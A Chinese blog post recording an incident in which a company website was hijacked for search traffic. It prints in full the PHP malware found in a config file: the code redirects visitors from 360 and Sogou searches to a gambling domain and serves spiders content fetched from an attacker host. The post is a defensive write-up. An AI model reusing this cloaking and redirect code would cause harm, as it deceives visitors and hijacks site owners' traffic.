记一次搜索引擎劫持攻击

最近公司网站连续被黑了两次,都是被植入了一些恶意代码,让点击进入网站的时候,跳往色情、赌博等网站。这里就简单记录下吧,下次再遇上,好有个参考。

JS代码植入

网站表现为,当用户从浏览器第一次访问时网页时,会弹出一个色情网站广告的弹窗,随后经过几秒钟便会跳往该网站。此状况比较容易识别,可能的情况有一下几种

  • JS代码中植入了重定向代码
  • XSS攻击,用户提交的信息未经过验证,附带了恶意JS代码,并发往浏览器进行执行。
  • 用户上传的图片中隐藏了经过压缩的JS代码,此类攻击比较隐蔽,让站长们很难找出来,需要注意的是,在用户上传图片的时候,图片也不能忽视验证。

本次攻击的方式为第一种,恶意代码隐藏在经过压缩的JQuery文件中,因此文件为压缩文件,隐藏性较高。

PHP代码植入

此情况表现为,当用户用360搜索本站时,点击结果时,会跳往赌博网站,点击快照为正常本站网页,而且用百度、谷歌等搜索出来的结果均无问题。
由于排除了JS代码植入的可能,一度认为是360搜索搞的鬼,跟360官方支持邮件往来了几天,得到的结果仍然是说我网站被黑,没对我网站做任何手脚,好吧,就只能自己折腾一遍,扫了一遍源码。确实发现了恶意代码,压缩过地植入到配置文件中,如下:

define('u_b','/');
define('s_u','http://idx.root1111.com/');
define('s_s', '@haosou.com|360Spider|sougou|HaosouSpider|so.com@i');
define('h_t',$_SERVER['SERVER_NAME']);
define('r_s',$_SERVER['HTTP_REFERER']);
define('u_s',$_SERVER['HTTP_USER_AGENT']);
define('h_z',s_p());
function s_p() {
    $d = '';
    if (isset($_SERVER['REQUEST_URI'])) {
        $d = $_SERVER['REQUEST_URI'];
    } else {
        if (isset($_SERVER['argv'])) {
            $d = $_SERVER['PHP_SELF'].'?'.$_SERVER['argv'][0];
        } else {
            $d = $_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'];
        }
    }
    if (isset($_SERVER['SERVER_SOFTWARE']) && false !== stristr($_SERVER['SERVER_SOFTWARE'], 'IIS')) {
        if (function_exists('mb_convert_encoding')) {
            $d = mb_convert_encoding($d, 'UTF-8', 'GBK');
        } else {
            $d = @iconv('GBK', 'UTF-8', @iconv('UTF-8', 'GBK', $d)) == $d ? $d: @iconv('GBK', 'UTF-8', $d);
        }
    }
    $r = explode('#', $d, 2);
    $d = $r[0];
    return $d;
}
function r_s($url) {
    $o = array('http' = >array('method' = >"GET", 'timeout' = >8));
    $context = stream_context_create($o);
    $h = file_get_contents($url, false, $context);
    if (empty($h)) {
        $h = file_get_contents($url);
    }
    return $h;
}
if (preg_match(s_s, r_s)) {
    $d_s = true;
    if (preg_match("@site%3A|inurl%3A@i", r_s)) {
        setcookie('xx', h_t, time() + 259200);
        $d_s = false;
    }
    if ($d_s) {
        header('Location: http://668689.net');
        exit;
    }
}
if (strstr(h_z, u_b)) {
    if (preg_match(s_s, u_s)) {
        $d_u = s_u.'?xu='.bin2hex(h_z);
        $d_u. = '&xh='.bin2hex(h_t);
        $d_c = r_s($d_u);
        echo $d_c;
        exit;
    }
}

黑客只对来源360搜索和搜狗搜索的结果进行了重定向,颇有取舍,也造成了站长的疑惑,让人怀疑是360搞的鬼,套路深。

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 212,332评论 6 493
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 90,508评论 3 385
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 157,812评论 0 348
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 56,607评论 1 284
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 65,728评论 6 386
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 49,919评论 1 290
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,071评论 3 410
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 37,802评论 0 268
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,256评论 1 303
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 36,576评论 2 327
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 38,712评论 1 341
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,389评论 4 332
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,032评论 3 316
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 30,798评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,026评论 1 266
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 46,473评论 2 360
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 43,606评论 2 350

推荐阅读更多精彩内容